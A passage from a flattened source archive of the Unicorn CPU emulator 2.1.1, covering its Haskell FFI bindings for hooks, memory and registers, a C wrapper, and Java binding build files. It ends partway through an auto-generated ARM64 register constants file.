UC_HOOK_MEM_WRITE_PROT , UC_HOOK_MEM_FETCH_PROT , UC_HOOK_MEM_READ , UC_HOOK_MEM_WRITE , UC_HOOK_MEM_FETCH , UC_HOOK_MEM_READ_AFTER ) with prefix = "UC_" deriving (Show, Eq, Bounded) #} -- | Memory hook types (for valid memory accesses). {# enum uc_hook_type as MemoryHookType { underscoreToCase } omit ( UC_HOOK_INTR , UC_HOOK_INSN , UC_HOOK_CODE , UC_HOOK_BLOCK , UC_HOOK_MEM_READ_UNMAPPED , UC_HOOK_MEM_WRITE_UNMAPPED , UC_HOOK_MEM_FETCH_UNMAPPED , UC_HOOK_MEM_READ_PROT , UC_HOOK_MEM_WRITE_PROT , UC_HOOK_MEM_FETCH_PROT ) with prefix = "UC_" deriving (Show, Eq, Bounded) #} -- | Memory event hook types (for invalid memory accesses). {# enum uc_hook_type as MemoryEventHookType { underscoreToCase } omit ( UC_HOOK_INTR , UC_HOOK_INSN , UC_HOOK_CODE , UC_HOOK_BLOCK , UC_HOOK_MEM_READ , UC_HOOK_MEM_WRITE , UC_HOOK_MEM_FETCH , UC_HOOK_MEM_READ_AFTER ) with prefix = "UC_" deriving (Show, Eq, Bounded) #} -- | Unify the hook types with a type class class Enum a => HookTypeC a instance HookTypeC HookType instance HookTypeC MemoryHookType instance HookTypeC MemoryEventHookType -- | Memory access. {# enum uc_mem_type as MemoryAccess { underscoreToCase } with prefix = "UC_" deriving (Show, Eq, Bounded) #} ------------------------------------------------------------------------------- -- Hook callbacks ------------------------------------------------------------------------------- -- | Callback function for tracing code. type CodeHook a = Engine -- ^ 'Unicorn' engine handle -> Word64 -- ^ Addres where the code is being executed -> Maybe Int -- ^ Size of machine instruction(s) being -- executed, or 'Nothing' when size is unknown -> a -- ^ User data passed to tracing APIs -> IO () type CCodeHook = EnginePtr -> Word64 -> Word32 -> Ptr () -> IO () foreign import ccall "wrapper" mkCodeHook :: CCodeHook -> IO {# type uc_cb_hookcode_t #} marshalCodeHook :: Storable a => CodeHook a -> IO {# type uc_cb_hookcode_t #} marshalCodeHook codeHook = mkCodeHook $ \ucPtr address size userDataPtr -> do uc <- mkEngineNC ucPtr userData <- castPtrAndPeek userDataPtr let maybeSize = if size == 0 then Nothing else Just $ fromIntegral size codeHook uc address maybeSize userData -- | Callback function for tracing interrupts. type InterruptHook a = Engine -- ^ 'Unicorn' engine handle -> Int -- ^ Interrupt number -> a -- ^ User data passed to tracing APIs -> IO () type CInterruptHook = EnginePtr -> Word32 -> Ptr () -> IO () foreign import ccall "wrapper" mkInterruptHook :: CInterruptHook -> IO {# type uc_cb_hookintr_t #} marshalInterruptHook :: Storable a => InterruptHook a -> IO {# type uc_cb_hookintr_t #} marshalInterruptHook interruptHook = mkInterruptHook $ \ucPtr intNo userDataPtr -> do uc <- mkEngineNC ucPtr userData <- castPtrAndPeek userDataPtr interruptHook uc (fromIntegral intNo) userData -- | Callback function for tracing blocks. type BlockHook a = CodeHook a marshalBlockHook :: Storable a => BlockHook a -> IO {# type uc_cb_hookcode_t #} marshalBlockHook = marshalCodeHook -- | Callback function for tracing IN instructions (X86). type InHook a = Engine -- ^ 'Unicorn' engine handle -> Int -- ^ Port number -> Int -- ^ Data size (1/2/4) to be read from this port -> a -- ^ User data passed to tracing APIs -> IO Word32 -- ^ The data read from the port type CInHook = EnginePtr -> Word32 -> Int32 -> Ptr () -> IO Word32 foreign import ccall "wrapper" mkInHook :: CInHook -> IO {# type uc_cb_insn_in_t #} marshalInHook :: Storable a => InHook a -> IO {# type uc_cb_insn_in_t #} marshalInHook inHook = mkInHook $ \ucPtr port size userDataPtr -> do uc <- mkEngineNC ucPtr userData <- castPtrAndPeek userDataPtr inHook uc (fromIntegral port) (fromIntegral size) userData -- | Callback function for tracing OUT instructions (X86). type OutHook a = Engine -- ^ 'Unicorn' engine handle -> Int -- ^ Port number -> Int -- ^ Data size (1/2/4) to be written to this port -> Int -- ^ Data value to be written to this port -> a -- ^ User data passed to tracing APIs -> IO () type COutHook = EnginePtr -> Word32 -> Int32 -> Word32 -> Ptr () -> IO () foreign import ccall "wrapper" mkOutHook :: COutHook -> IO {# type uc_cb_insn_out_t #} marshalOutHook :: Storable a => OutHook a -> IO {# type uc_cb_insn_out_t #} marshalOutHook outHook = mkOutHook $ \ucPtr port size value userDataPtr -> do uc <- mkEngineNC ucPtr userData <- castPtrAndPeek userDataPtr outHook uc (fromIntegral port) (fromIntegral size) (fromIntegral value) userData -- | Callback function for tracing SYSCALL instructions (X86). type SyscallHook a = Engine -- ^ 'Unicorn' engine handle -> a -- ^ User data passed to tracing APIs -> IO () type CSyscallHook = Ptr () -> Ptr () -> IO () foreign import ccall "wrapper" mkSyscallHook :: CSyscallHook -> IO {# type uc_cb_insn_syscall_t #} marshalSyscallHook :: Storable a => SyscallHook a -> IO {# type uc_cb_insn_syscall_t #} marshalSyscallHook syscallHook = mkSyscallHook $ \ucPtr userDataPtr -> do uc <- mkEngineNC $ castPtr ucPtr userData <- castPtrAndPeek userDataPtr syscallHook uc userData -- | Callback function for hooking memory operations. type MemoryHook a = Engine -- ^ 'Unicorn' engine handle -> MemoryAccess -- ^ Memory access; read or write -> Word64 -- ^ Address where the code is being -- executed -> Int -- ^ Size of data being read or written -> Maybe Int -- ^ Value of data being wrriten, or -- 'Nothing' if read -> a -- ^ User data passed to tracing APIs -> IO () type CMemoryHook = EnginePtr -> Int32 -> Word64 -> Int32 -> Int64 -> Ptr () -> IO () foreign import ccall "wrapper" mkMemoryHook :: CMemoryHook -> IO {# type uc_cb_hookmem_t #} marshalMemoryHook :: Storable a => MemoryHook a -> IO {# type uc_cb_hookmem_t #} marshalMemoryHook memoryHook = mkMemoryHook $ \ucPtr memAccessI address size value userDataPtr -> do uc <- mkEngineNC ucPtr userData <- castPtrAndPeek userDataPtr let memAccess = toMemAccess memAccessI maybeValue = case memAccess of MemRead -> Nothing MemWrite -> Just $ fromIntegral value _ -> error "Invalid memory access" memoryHook uc memAccess address (fromIntegral size) maybeValue userData -- | Callback function for hooking memory reads. type MemoryReadHook a = Engine -- ^ 'Unicorn' engine handle -> Word64 -- ^ Address where the code is being executed -> Int -- ^ Size of data being read -> a -- ^ User data passed to tracing APIs -> IO () marshalMemoryReadHook :: Storable a => MemoryReadHook a -> IO {# type uc_cb_hookmem_t #} marshalMemoryReadHook memoryReadHook = mkMemoryHook $ \ucPtr _ address size _ userDataPtr -> do uc <- mkEngineNC ucPtr userData <- castPtrAndPeek userDataPtr memoryReadHook uc address (fromIntegral size) userData -- | Callback function for hooking memory writes. type MemoryWriteHook a = Engine -- ^ 'Unicorn' engine handle -> Word64 -- ^ Address where the code is being -- executed -> Int -- ^ Size of data being written -> Int -- ^ Value of data being written -> a -- ^ User data passed to tracing APIs -> IO () marshalMemoryWriteHook :: Storable a => MemoryWriteHook a -> IO {# type uc_cb_hookmem_t #} marshalMemoryWriteHook memoryWriteHook = mkMemoryHook $ \ucPtr _ address size value userDataPtr -> do uc <- mkEngineNC ucPtr userData <- castPtrAndPeek userDataPtr memoryWriteHook uc address (fromIntegral size) (fromIntegral value) userData -- | Callback function for handling invalid memory access events. type MemoryEventHook a = Engine -- ^ 'Unicorn' engine handle -> MemoryAccess -- ^ Memory access; read or write -> Word64 -- ^ Address where the code is being -- executed -> Int -- ^ Size of data being read or written -> Maybe Int -- ^ Value of data being written, or -- 'Nothing' if read -> a -- ^ User data passed to tracing APIs -> IO Bool -- ^ Return 'True' to continue, or -- 'False' to stop the program (due to -- invalid memory) type CMemoryEventHook = EnginePtr -> Int32 -> Word64 -> Int32 -> Int64 -> Ptr () -> IO Int32 foreign import ccall "wrapper" mkMemoryEventHook :: CMemoryEventHook -> IO {# type uc_cb_eventmem_t #} marshalMemoryEventHook :: Storable a => MemoryEventHook a -> IO {# type uc_cb_eventmem_t #} marshalMemoryEventHook eventMemoryHook = mkMemoryEventHook $ \ucPtr memAccessI address size value userDataPtr -> do uc <- mkEngineNC ucPtr userData <- castPtrAndPeek userDataPtr let memAccess = toMemAccess memAccessI maybeValue = case memAccess of MemReadUnmapped -> Nothing MemReadProt -> Nothing MemWriteUnmapped -> Just $ fromIntegral value MemWriteProt -> Just $ fromIntegral value _ -> error "Invalid memory access" res <- eventMemoryHook uc memAccess address (fromIntegral size) maybeValue userData return $ boolToInt res where boolToInt True = 1 boolToInt False = 0 ------------------------------------------------------------------------------- -- Hook callback registration (and deletion) ------------------------------------------------------------------------------- {# fun variadic uc_hook_add as ucHookAdd `HookTypeC h' => { `Engine' , alloca- `Hook' peek* , enumToNum `h' , castFunPtrToPtr `FunPtr b' , castPtr `Ptr a' , `Word64' , `Word64' } -> `Error' #} {# fun variadic uc_hook_add[int] as ucInsnHookAdd `HookTypeC h' => { `Engine' , alloca- `Hook' peek* , enumToNum `h' , castFunPtrToPtr `FunPtr b' , castPtr `Ptr a' , `Word64' , `Word64' , enumToNum `Instruction' } -> `Error' #} -- | Unregister (remove) a hook callback. {# fun uc_hook_del as ^ { `Engine' , fromIntegral `Hook' } -> `Error' #} ------------------------------------------------------------------------------- -- Helper functions ------------------------------------------------------------------------------- toMemAccess :: Integral a => a -> MemoryAccess toMemAccess = toEnum . fromIntegral unicorn-2.1.1/bindings/haskell/src/Unicorn/Internal/Unicorn.chs000066400000000000000000000201551467524106700245230ustar00rootroot00000000000000{-# LANGUAGE ForeignFunctionInterface #-} {-# LANGUAGE ScopedTypeVariables #-} {-| Module : Unicorn.Internal.Unicorn Description : The Unicorn CPU emulator. Copyright : (c) Adrian Herrera, 2016 License : GPL-2 Low-level bindings for the Unicorn CPU emulator framework. This module should not be directly imported; it is only exposed because of the way cabal handles ordering of chs files. -} module Unicorn.Internal.Unicorn ( -- * Types Architecture(..) , Mode(..) , MemoryPermission(..) , MemoryRegion(..) , QueryType(..) , Context -- * Function bindings , ucOpen , ucQuery , ucEmuStart , ucEmuStop , ucRegWrite , ucRegRead , ucRegWriteBatch , ucRegReadBatch , ucMemWrite , ucMemRead , ucMemMap , ucMemUnmap , ucMemProtect , ucMemRegions , mkContext , ucContextAlloc , ucContextSave , ucContextRestore , ucVersion , ucErrno , ucStrerror ) where import Control.Applicative import Control.Monad import Data.ByteString (ByteString, useAsCStringLen) import Foreign import Foreign.C import Prelude hiding (until) import Unicorn.Internal.Util {# import Unicorn.Internal.Core #} {# context lib = "unicorn" #} #include #include "unicorn_wrapper.h" ------------------------------------------------------------------------------- -- Types ------------------------------------------------------------------------------- -- | CPU architecture. {# enum uc_arch as Architecture { underscoreToCase } with prefix = "UC_" deriving (Show, Eq, Bounded) #} -- | CPU hardware mode. {# enum uc_mode as Mode { underscoreToCase } with prefix = "UC_" deriving (Show, Eq, Bounded) #} -- | Memory permissions. {# enum uc_prot as MemoryPermission { underscoreToCase } with prefix = "UC_" deriving (Show, Eq, Bounded) #} -- | Memory region mapped by 'memMap'. Retrieve the list of memory regions with -- 'memRegions'. data MemoryRegion = MemoryRegion { mrBegin :: Word64 -- ^ Begin address of the region (inclusive) , mrEnd :: Word64 -- ^ End address of the region (inclusive) , mrPerms :: [MemoryPermission] -- ^ Memory permissions of the region } instance Storable MemoryRegion where sizeOf _ = {# sizeof uc_mem_region #} alignment _ = {# alignof uc_mem_region #} peek p = MemoryRegion <$> liftA fromIntegral ({# get uc_mem_region->begin #} p) <*> liftA fromIntegral ({# get uc_mem_region->end #} p) <*> liftA expandMemPerms ({# get uc_mem_region->perms #} p) poke p mr = do {# set uc_mem_region.begin #} p (fromIntegral $ mrBegin mr) {# set uc_mem_region.end #} p (fromIntegral $ mrEnd mr) {# set uc_mem_region.perms #} p (combineEnums $ mrPerms mr) -- | A pointer to a memory region. {# pointer *uc_mem_region as MemoryRegionPtr -> MemoryRegion #} -- | Query types for the 'query' API. {# enum uc_query_type as QueryType { underscoreToCase } with prefix = "UC_" deriving (Show, Eq, Bounded) #} -- | Opaque storage for CPU context, used with the context functions. {# pointer *uc_context as Context foreign finalizer uc_free_wrapper as memFree newtype #} -- | A pointer to a CPU context. {# pointer *uc_context as ContextPtr -> Context #} -- | Make a CPU context out of a context pointer. The returned CPU context will -- automatically call 'uc_free' when it goes out of scope. mkContext :: ContextPtr -> IO Context mkContext ptr = liftM Context (newForeignPtr memFree ptr) ------------------------------------------------------------------------------- -- Emulator control ------------------------------------------------------------------------------- {# fun uc_open as ^ { `Architecture' , combineEnums `[Mode]' , alloca- `EnginePtr' peek* } -> `Error' #} {# fun uc_query as ^ { `Engine' , `QueryType' , alloca- `Int' castPtrAndPeek* } -> `Error' #} {# fun uc_emu_start as ^ { `Engine' , `Word64' , `Word64' , `Int' , `Int' } -> `Error' #} {# fun uc_emu_stop as ^ { `Engine' } -> `Error' #} ------------------------------------------------------------------------------- -- Register operations ------------------------------------------------------------------------------- {# fun uc_reg_write_wrapper as ucRegWrite `Reg r' => { `Engine' , enumToNum `r' , withIntegral* `Int64' } -> `Error' #} {# fun uc_reg_read_wrapper as ucRegRead `Reg r' => { `Engine' , enumToNum `r' , alloca- `Int64' castPtrAndPeek* } -> `Error' #} {# fun uc_reg_write_batch_wrapper as ucRegWriteBatch `Reg r' => { `Engine' , withEnums* `[r]' , integralListToArray* `[Int64]' , `Int' } -> `Error' #} {# fun uc_reg_read_batch_wrapper as ucRegReadBatch `Reg r' => { `Engine' , withEnums* `[r]' , castPtr `Ptr Int64' , `Int' } -> `Error' #} ------------------------------------------------------------------------------- -- Memory operations ------------------------------------------------------------------------------- {# fun uc_mem_write as ^ { `Engine' , `Word64' , withByteStringLen* `ByteString'& } -> `Error' #} {# fun uc_mem_read as ^ { `Engine' , `Word64' , castPtr `Ptr Word8' , `Int' } -> `Error' #} {# fun uc_mem_map as ^ { `Engine' , `Word64' , `Int' , combineEnums `[MemoryPermission]' } -> `Error' #} {# fun uc_mem_unmap as ^ { `Engine' , `Word64' , `Int' } -> `Error' #} {# fun uc_mem_protect as ^ { `Engine' , `Word64' , `Int' , combineEnums `[MemoryPermission]' } -> `Error' #} {# fun uc_mem_regions as ^ { `Engine' , alloca- `MemoryRegionPtr' peek* , alloca- `Int' castPtrAndPeek* } -> `Error' #} ------------------------------------------------------------------------------- -- Context ------------------------------------------------------------------------------- {# fun uc_context_alloc as ^ { `Engine' , alloca- `ContextPtr' peek* } -> `Error' #} {# fun uc_context_save as ^ { `Engine' , `Context' } -> `Error' #} {# fun uc_context_restore as ^ { `Engine' , `Context' } -> `Error' #} ------------------------------------------------------------------------------- -- Misc. ------------------------------------------------------------------------------- {# fun pure unsafe uc_version as ^ { id `Ptr CUInt' , id `Ptr CUInt' } -> `Int' #} {# fun unsafe uc_errno as ^ { `Engine' } -> `Error' #} {# fun pure unsafe uc_strerror as ^ { `Error' } -> `String' #} ------------------------------------------------------------------------------- -- Helper functions ------------------------------------------------------------------------------- expandMemPerms :: (Integral a, Bits a) => a -> [MemoryPermission] expandMemPerms perms = -- Only interested in the 3 least-significant bits let maskedPerms = fromIntegral $ perms .&. 0x7 in if maskedPerms == 0x0 then [ProtNone] else if maskedPerms == 0x7 then [ProtAll] else checkRWE maskedPerms [ProtRead, ProtWrite, ProtExec] where checkRWE p (x:xs) = if p .&. (fromEnum x) /= 0 then x : checkRWE p xs else checkRWE p xs checkRWE _ [] = [] withIntegral :: (Integral a, Num b, Storable b) => a -> (Ptr b -> IO c) -> IO c withIntegral = with . fromIntegral withByteStringLen :: Integral a => ByteString -> ((Ptr (), a) -> IO b) -> IO b withByteStringLen bs f = useAsCStringLen bs $ \(ptr, len) -> f (castPtr ptr, fromIntegral len) withEnums :: Enum a => [a] -> (Ptr b -> IO c) -> IO c withEnums l f = let ints :: [CInt] = map enumToNum l in withArray ints $ \ptr -> f (castPtr ptr) integralListToArray :: (Integral a, Storable b, Num b) => [a] -> (Ptr b -> IO c) -> IO c integralListToArray l f = let l' = map fromIntegral l in withArray l' $ \array -> f array unicorn-2.1.1/bindings/haskell/src/Unicorn/Internal/Util.hs000066400000000000000000000013161467524106700236560ustar00rootroot00000000000000{-| Module : Unicorn.Internal.Util Description : Utility (aka helper) functions for the Unicorn emulator. Copyright : (c) Adrian Herrera, 2016 License : GPL-2 -} module Unicorn.Internal.Util where import Data.Bits import Foreign -- | Combine a list of Enums by performing a bitwise-OR. combineEnums :: (Enum a, Num b, Bits b) => [a] -> b combineEnums = foldr ((.|.) <$> enumToNum) 0 -- | Cast a pointer and then peek inside it. castPtrAndPeek :: Storable a => Ptr b -> IO a castPtrAndPeek = peek . castPtr -- | Convert an 'Eum' to a 'Num'. enumToNum :: (Enum a, Num b) => a -> b enumToNum = fromIntegral . fromEnum unicorn-2.1.1/bindings/haskell/src/cbits/000077500000000000000000000000001467524106700203175ustar00rootroot00000000000000unicorn-2.1.1/bindings/haskell/src/cbits/unicorn_wrapper.c000066400000000000000000000021741467524106700237040ustar00rootroot00000000000000#include #include "unicorn_wrapper.h" void uc_close_wrapper(uc_engine *uc) { uc_close(uc); } void uc_close_dummy(uc_engine *uc) { } uc_err uc_reg_write_wrapper(uc_engine *uc, int regid, const int64_t *value) { return uc_reg_write(uc, regid, (const void*) value); } uc_err uc_reg_read_wrapper(uc_engine *uc, int regid, int64_t *value) { return uc_reg_read(uc, regid, (void*) value); } uc_err uc_reg_write_batch_wrapper(uc_engine *uc, int *regs, int64_t *vals, int count) { void **valsPtr = malloc(sizeof(void*) * count); int i; for (i = 0; i < count; ++i) { valsPtr[i] = (void*) &vals[i]; } uc_err ret = uc_reg_write_batch(uc, regs, (void *const*) valsPtr, count); free(valsPtr); return ret; } uc_err uc_reg_read_batch_wrapper(uc_engine *uc, int *regs, int64_t *vals, int count) { void **valsPtr = malloc(sizeof(void*) * count); int i; for (i = 0; i < count; ++i) { valsPtr[i] = (void*) &vals[i]; } uc_err ret = uc_reg_read_batch(uc, regs, valsPtr, count); free(valsPtr); return ret; } void uc_free_wrapper(void *mem) { uc_free(mem); } unicorn-2.1.1/bindings/haskell/src/include/000077500000000000000000000000001467524106700206365ustar00rootroot00000000000000unicorn-2.1.1/bindings/haskell/src/include/unicorn_wrapper.h000066400000000000000000000014711467524106700242270ustar00rootroot00000000000000#ifndef UNICORN_WRAPPER_H #define UNICORN_WRAPPER_H #include #include /* * Wrap Unicorn's uc_close function and ignore the returned error code. */ void uc_close_wrapper(uc_engine *uc); /* * Doesn't actually do anything. */ void uc_close_dummy(uc_engine *uc); /* * Wrappers for register read/write functions that accept int64_t pointers. */ uc_err uc_reg_write_wrapper(uc_engine *uc, int regid, const int64_t *value); uc_err uc_reg_read_wrapper(uc_engine *uc, int regid, int64_t *value); uc_err uc_reg_write_batch_wrapper(uc_engine *uc, int *regs, int64_t *vals, int count); uc_err uc_reg_read_batch_wrapper(uc_engine *uc, int *regs, int64_t *vals, int count); /* * Wrap Unicorn's uc_free function and ignore the returned error code. */ void uc_free_wrapper(void *context); #endif unicorn-2.1.1/bindings/haskell/unicorn.cabal000066400000000000000000000030261467524106700210660ustar00rootroot00000000000000-- Initial unicorn.cabal generated by cabal init. For further -- documentation, see http://haskell.org/cabal/users-guide/ name: unicorn version: 0.1.0.0 category: FFI, Emulation synopsis: Unicorn CPU emulator engine description: Haskell bindings for the Unicorn CPU emulator engine. homepage: https://github.com/unicorn-engine/unicorn author: Adrian Herrera license: GPL copyright: (c) 2016, Adrian Herrera category: System build-type: Simple stability: experimental cabal-version: >= 1.10 extra-source-files: cbits/ , include/ library exposed-modules: Unicorn.Internal.Core Unicorn.Internal.Unicorn Unicorn.CPU.Arm64 Unicorn.CPU.Arm Unicorn.CPU.M68k Unicorn.CPU.Mips Unicorn.CPU.Sparc Unicorn.CPU.X86 Unicorn.Internal.Hook Unicorn.Hook Unicorn other-modules: Unicorn.Internal.Util build-depends: base >=4 && <5 , bytestring >= 0.9.1 , transformers < 0.6 hs-source-dirs: src c-sources: src/cbits/unicorn_wrapper.c include-dirs: src/include build-tools: c2hs pkgconfig-depends: unicorn default-language: Haskell2010 ghc-options: -Wall unicorn-2.1.1/bindings/java/000077500000000000000000000000001467524106700157225ustar00rootroot00000000000000unicorn-2.1.1/bindings/java/.gitignore000066400000000000000000000000101467524106700177010ustar00rootroot00000000000000target/ unicorn-2.1.1/bindings/java/CMakeLists.txt000066400000000000000000000013251467524106700204630ustar00rootroot00000000000000cmake_minimum_required(VERSION 3.1) find_package(JNI) if (JNI_FOUND) message (STATUS "JNI_INCLUDE_DIRS=${JNI_INCLUDE_DIRS}") message (STATUS "JNI_LIBRARIES=${JNI_LIBRARIES}") else() message(FATAL_ERROR "JNI not found, please try to update JAVA_HOME accordingly") endif() add_library(unicorn_java SHARED unicorn_Unicorn.c) message("${CMAKE_CURRENT_SOURCE_DIR}/bindings/java/target/headers") if (NOT EXISTS "${CMAKE_CURRENT_SOURCE_DIR}/target/headers") message(FATAL_ERROR "bindings/java/target/headers not generated, please generate them firstly") endif() target_include_directories(unicorn_java PRIVATE target/headers ${JNI_INCLUDE_DIRS}) target_link_libraries(unicorn_java PRIVATE unicorn ${JNI_LIBRARIES})unicorn-2.1.1/bindings/java/Makefile000066400000000000000000000022361467524106700173650ustar00rootroot00000000000000# Makefile for the native JNI library. Automatically called by Maven. JAVA_HOME ?= $(shell java -XshowSettings:properties -version 2>&1 | sed -n 's/ *java.home = //p') ifeq ($(JAVA_HOME),) $(error JAVA_HOME could not be determined; please set it manually (make JAVA_HOME=...)) endif JAVA_INC := $(JAVA_HOME)/include JAVA_PLATFORM_INC := $(shell dirname `find $(JAVA_INC) -name jni_md.h`) UNICORN_INC := ../../include OS := $(shell uname) ifeq ($(OS),Darwin) LIB_EXT=.dylib else ifeq ($(OS),Linux) LIB_EXT=.so else LIB_EXT=.dll endif all: libunicorn_java$(LIB_EXT) CC=gcc CFLAGS=-fPIC LDFLAGS=-shared -fPIC # May also use -lunicorn to dynamically link against the installed unicorn LIBS=../../build/libunicorn.a INCS=-I target/headers -I$(JAVA_INC) -I$(JAVA_PLATFORM_INC) -I$(UNICORN_INC) OBJS=unicorn_Unicorn.o unicorn_Unicorn.o: unicorn_Unicorn.c target/headers/unicorn_Unicorn.h $(CC) -O2 -Wall -Wextra -Wno-unused-parameter -c $(CFLAGS) $(INCS) $< -o $@ libunicorn_java$(LIB_EXT): $(OBJS) $(CC) -o $@ $(LDFLAGS) $(OBJS) $(LIBS) gen_const: cd .. && python3 const_generator.py java clean: rm -f libunicorn_java$(LIB_EXT) rm -f $(OBJS) .PHONY: all clean unicorn-2.1.1/bindings/java/README.md000066400000000000000000000030751467524106700172060ustar00rootroot00000000000000This documentation explains how to install the Java binding for Unicorn from source. 0. Follow `docs/COMPILE.md` in the root directory to compile the core to the `build` directory. Note: by default, the Java binding native library will be built by statically linking to `../../build/libunicorn.a`, thereby removing `libunicorn` as a runtime dependency, but making the produced native library `libunicorn_java` bigger. If you instead want to dynamically link against the installed `libunicorn`, change `LIBS=../../build/libunicorn.a` to `LIBS=-lunicorn` in `Makefile`. 1. Install a JDK for your platform. 2. Install Maven: https://maven.apache.org/install.html. 3. Change directories into the java bindings and build the Maven package: $ mvn package This will automatically build and test the Unicorn Java bindings. The bindings consist of the native JNI library (`libunicorn_java.{so,dylib,dll}`) and the Java JAR (`target/unicorn-2.xx.jar`). You will need to have the native library on `java.library.path` and the JAR on your classpath. The `src/main/test/java` directory contains some sample code to show how to use Unicorn API. `samples` is a set of sample classes showcasing the various features of the Unicorn API, while `tests` is a set of JUnit tests for the API. - `Sample_.java`: These show how to access architecture-specific information for each architecture. - `Shellcode.java`: This shows how to analyze a Linux shellcode. - `SampleNetworkAuditing.java`: Unicorn sample for auditing network connection and file handling in shellcode. unicorn-2.1.1/bindings/java/eclipse-formatter.xml000066400000000000000000001301731467524106700220760ustar00rootroot00000000000000 unicorn-2.1.1/bindings/java/pom.xml000066400000000000000000000055551467524106700172510ustar00rootroot00000000000000 4.0.0 org.unicorn-engine unicorn 2.1.1 unicorn https://www.unicorn-engine.org UTF-8 1.8 1.8 junit junit 4.13.2 test org.apache.maven.plugins maven-compiler-plugin 3.11.0 -h target/headers org.codehaus.mojo exec-maven-plugin 3.1.0 generate-consts generate-sources exec python3 const_generator.py java ${project.basedir}/.. compile-jni-lib compile exec make JAVA_HOME=${java.home} all clean-jni-lib clean exec make clean unicorn-2.1.1/bindings/java/src/000077500000000000000000000000001467524106700165115ustar00rootroot00000000000000unicorn-2.1.1/bindings/java/src/main/000077500000000000000000000000001467524106700174355ustar00rootroot00000000000000unicorn-2.1.1/bindings/java/src/main/java/000077500000000000000000000000001467524106700203565ustar00rootroot00000000000000unicorn-2.1.1/bindings/java/src/main/java/unicorn/000077500000000000000000000000001467524106700220335ustar00rootroot00000000000000unicorn-2.1.1/bindings/java/src/main/java/unicorn/Arm64Const.java000066400000000000000000000403131467524106700245770ustar00rootroot00000000000000// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT package unicorn; public interface Arm64Const { // ARM64 CPU public static final int UC_CPU_ARM64_A57 = 0; public static final int UC_CPU_ARM64_A53 = 1; public static final int UC_CPU_ARM64_A72 = 2; public static final int UC_CPU_ARM64_MAX = 3; public static final int UC_CPU_ARM64_ENDING = 4; // ARM64 registers public static final int UC_ARM64_REG_INVALID = 0; public static final int UC_ARM64_REG_X29 = 1; public static final int UC_ARM64_REG_X30 = 2; public static final int UC_ARM64_REG_NZCV = 3; public static final int UC_ARM64_REG_SP = 4; public static final int UC_ARM64_REG_WSP = 5; public static final int UC_ARM64_REG_WZR = 6; public static final int UC_ARM64_REG_XZR = 7; public static final int UC_ARM64_REG_B0 = 8; public static final int UC_ARM64_REG_B1 = 9; public static final int UC_ARM64_REG_B2 = 10; public static final int UC_ARM64_REG_B3 = 11; public static final int UC_ARM64_REG_B4 = 12; public static final int UC_ARM64_REG_B5 = 13; public static final int UC_ARM64_REG_B6 = 14; public static final int UC_ARM64_REG_B7 = 15; public static final int UC_ARM64_REG_B8 = 16; public static final int UC_ARM64_REG_B9 = 17; public static final int UC_ARM64_REG_B10 = 18; public static final int UC_ARM64_REG_B11 = 19; public static final int UC_ARM64_REG_B12 = 20; public static final int UC_ARM64_REG_B13 = 21; public static final int UC_ARM64_REG_B14 = 22; public static final int UC_ARM64_REG_B15 = 23; public static final int UC_ARM64_REG_B16 = 24; public static final int UC_ARM64_REG_B17 = 25; public static final int UC_ARM64_REG_B18 = 26; public static final int UC_ARM64_REG_B19 = 27; public static final int UC_ARM64_REG_B20 = 28; public static final int UC_ARM64_REG_B21 = 29; public static final int UC_ARM64_REG_B22 = 30; public static final int UC_ARM64_REG_B23 = 31; public static final int UC_ARM64_REG_B24 = 32; public static final int UC_ARM64_REG_B25 = 33; public static final int UC_ARM64_REG_B26 = 34; public static final int UC_ARM64_REG_B27 = 35; public static final int UC_ARM64_REG_B28 = 36; public static final int UC_ARM64_REG_B29 = 37; public static final int UC_ARM64_REG_B30 = 38; public static final int UC_ARM64_REG_B31 = 39; public static final int UC_ARM64_REG_D0 = 40; public static final int UC_ARM64_REG_D1 = 41; public static final int UC_ARM64_REG_D2 = 42; public static final int UC_ARM64_REG_D3 = 43; public static final int UC_ARM64_REG_D4 = 44; public static final int UC_ARM64_REG_D5 = 45; public static final int UC_ARM64_REG_D6 = 46; public static final int UC_ARM64_REG_D7 = 47; public static final int UC_ARM64_REG_D8 = 48; public static final int UC_ARM64_REG_D9 = 49; public static final int UC_ARM64_REG_D10 = 50; public static final int UC_ARM64_REG_D11 = 51; public static final int UC_ARM64_REG_D12 = 52; public static final int UC_ARM64_REG_D13 = 53; public static final int UC_ARM64_REG_D14 = 54; public static final int UC_ARM64_REG_D15 = 55; public static final int UC_ARM64_REG_D16 = 56; public static final int UC_ARM64_REG_D17 = 57; public static final int UC_ARM64_REG_D18 = 58; public static final int UC_ARM64_REG_D19 = 59; public static final int UC_ARM64_REG_D20 = 60; public static final int UC_ARM64_REG_D21 = 61; public static final int UC_ARM64_REG_D22 = 62; public static final int UC_ARM64_REG_D23 = 63; public static final int UC_ARM64_REG_D24 = 64; public static final int UC_ARM64_REG_D25 = 65; public static final int UC_ARM64_REG_D26 = 66; public static final int UC_ARM64_REG_D27 = 67; public static final int UC_ARM64_REG_D28 = 68; public static final int UC_ARM64_REG_D29 = 69; public static final int UC_ARM64_REG_D30 = 70; public static final int UC_ARM64_REG_D31 = 71; public static final int UC_ARM64_REG_H0 = 72; public static final int UC_ARM64_REG_H1 = 73; public static final int UC_ARM64_REG_H2 = 74; public static final int UC_ARM64_REG_H3 = 75; public static final int UC_ARM64_REG_H4 = 76; public static final int UC_ARM64_REG_H5 = 77; public static final int UC_ARM64_REG_H6 = 78; public static final int UC_ARM64_REG_H7 = 79; public static final int UC_ARM64_REG_H8 = 80; public static final int UC_ARM64_REG_H9 = 81; public static final int UC_ARM64_REG_H10 = 82; public static final int UC_ARM64_REG_H11 = 83; public static final int UC_ARM64_REG_H12 = 84; public static final int UC_ARM64_REG_H13 = 85; public static final int UC_ARM64_REG_H14 = 86; public static final int UC_ARM64_REG_H15 = 87; public static final int UC_ARM64_REG_H16 = 88; public static final int UC_ARM64_REG_H17 = 89; public static final int UC_ARM64_REG_H18 = 90; public static final int UC_ARM64_REG_H19 = 91; public static final int UC_ARM64_REG_H20 = 92; public static final int UC_ARM64_REG_H21 = 93; public static final int UC_ARM64_REG_H22 = 94; public static final int UC_ARM64_REG_H23 = 95; public static final int UC_ARM64_REG_H24 = 96; public static final int UC_ARM64_REG_H25 = 97; public static final int UC_ARM64_REG_H26 = 98; public static final int UC_ARM64_REG_H27 = 99; public static final int UC_ARM64_REG_H28 = 100; public static final int UC_ARM64_REG_H29 = 101; public static final int UC_ARM64_REG_H30 = 102; public static final int UC_ARM64_REG_H31 = 103; public static final int UC_ARM64_REG_Q0 = 104; public static final int 